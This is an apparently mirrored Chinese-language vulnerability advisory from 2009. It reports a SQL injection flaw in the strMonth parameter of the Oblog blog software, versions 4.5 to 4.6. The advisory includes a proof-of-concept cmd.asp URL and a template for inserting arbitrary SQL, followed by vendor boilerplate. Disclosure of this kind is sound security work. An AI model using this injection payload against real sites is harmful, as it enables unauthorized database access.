Lucene search
K

Oblog多用户博客程序strMonth变量过滤不严导致SQL注入漏洞

🗓️ 20 May 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 34 Views

Oblog多用户博客程序strMonth变量过滤不严导致SQL注入漏洞, 文件In/Class_UserCommand.asp中存在安全问题,构造合适的变量strMonth进行注射。Oblog 4.5-4.6存在sql漏

Code

                                                http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01

strDay变量从month中获得日期数据,并判断strDay是否为日期数据。所以构造的注射语句为:

http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01

执行sql语句采用rst.Open strSql,Conn,1,1

不能修改记录集.
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation